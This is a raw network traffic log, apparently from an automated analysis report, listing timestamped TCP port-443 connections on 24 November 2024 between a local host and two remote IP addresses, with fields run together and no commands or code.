                                                                                                                                                                                              Nov 24, 2024 13:40:21.632455111 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.632462025 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.632479906 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.632483959 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.635468006 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.635509968 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.635689020 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.635967016 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.635984898 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.641355038 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.641978025 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.641993046 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.642415047 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.642421007 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.683986902 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687390089 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687478065 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687525988 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687525988 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687547922 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.687570095 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.690427065 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.690471888 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.690557957 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.690720081 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.690731049 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.034660101 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.037956953 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.038091898 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.047976971 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.048002005 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.048012972 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.048019886 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.065629959 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.065690994 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.065783978 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.066128969 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.066143036 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.087584019 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.090796947 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.090850115 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.090852022 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.090897083 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.187840939 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.187869072 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.187886000 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.187895060 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.264120102 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.264169931 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:22.264233112 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.267796040 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:22.267807961 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.300138950 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.300812006 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.300827026 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.301433086 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.301438093 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.507090092 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.507608891 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.507630110 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.508119106 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.508127928 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.537512064 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.537956953 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.537985086 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.538582087 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.538585901 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770205021 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770282984 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770454884 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770617962 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770632982 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770651102 CET49939443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.770656109 CET4434993913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.774024963 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.774069071 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:23.774161100 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.774343967 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:23.774360895 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.009557962 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.009633064 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.009762049 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.011050940 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.011076927 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.011090040 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.011097908 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.014861107 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.014978886 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.015103102 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.015252113 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.015275002 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.015856028 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.016403913 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.016429901 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.016908884 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.016916990 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.107126951 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110218048 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110275984 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110363007 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110363007 CET49940443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110384941 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.110394001 CET4434994013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.113579035 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.113631010 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.113701105 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.113837957 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.113858938 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.159076929 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.159508944 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.159533024 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.159961939 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.159966946 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473051071 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473069906 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473134995 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473159075 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473666906 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473674059 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473691940 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473844051 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473876953 CET4434994113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.473917007 CET49941443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.479495049 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.479562044 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.479621887 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.480218887 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.480243921 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.642338037 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.642369032 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.642427921 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.642461061 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.642498016 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.669220924 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.669256926 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.669272900 CET49942443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.669280052 CET4434994213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.749978065 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.750061035 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.750169039 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.781991959 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:24.782011986 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.892976046 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:24.893013954 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:24.893075943 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:24.893935919 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:24.893949032 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.636142969 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.636687994 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.636722088 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.637171030 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.637177944 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.899095058 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.899724960 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.899807930 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.900213003 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.900232077 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.914554119 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.914988995 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.915030956 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:25.915540934 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:25.915549994 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.072441101 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077336073 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077394009 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077404976 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077656984 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077718973 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077734947 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077744961 CET49943443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.077752113 CET4434994313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.080594063 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.080637932 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.080765009 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.080940962 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.080949068 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.211956978 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.214595079 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.214647055 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.215085030 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.215096951 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.354504108 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.357728958 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.357856035 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.358128071 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.358160019 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.358174086 CET49944443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.358181953 CET4434994413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.361510992 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.361556053 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.361654997 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.361804008 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.361819029 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.468239069 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.470988035 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471035957 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471071005 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471105099 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471162081 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471184969 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471198082 CET49945443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.471204996 CET4434994513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.473931074 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.473992109 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.474078894 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.474252939 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.474266052 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.500595093 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.502249956 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.502269030 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.502650976 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.502655983 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.649733067 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.649805069 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.649916887 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.650094032 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.650119066 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.650132895 CET49946443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.650141001 CET4434994613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.653351068 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.653392076 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.653507948 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.653713942 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.653729916 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.936582088 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.936608076 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.936741114 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.936772108 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937123060 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937130928 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937149048 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937303066 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937335014 CET4434994713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.937376976 CET49947443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.941231966 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.941267967 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:26.941358089 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.941575050 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:26.941586971 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.105624914 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.105794907 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.107800007 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.107809067 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.108165026 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.109889030 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.109963894 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.109968901 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.110178947 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.151335955 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774069071 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774296999 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774367094 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774642944 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774658918 CET4434994820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.774673939 CET49948443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:27.864533901 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.865345955 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:27.865369081 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:27.865848064 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:27.865854979 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.141144037 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.141815901 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.141851902 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.142294884 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.142304897 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.315994024 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319262028 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319346905 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319399118 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319505930 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319631100 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319648027 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319664001 CET49949443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.319672108 CET4434994913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.323894024 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.323945999 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.324083090 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.324256897 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.324270964 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.330430984 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.330988884 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.331018925 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.331473112 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.331480026 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.436553001 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.437083960 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.437107086 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.437810898 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.437819004 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.599987030 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603269100 CET4434995013.107.246.63192.168.2.6
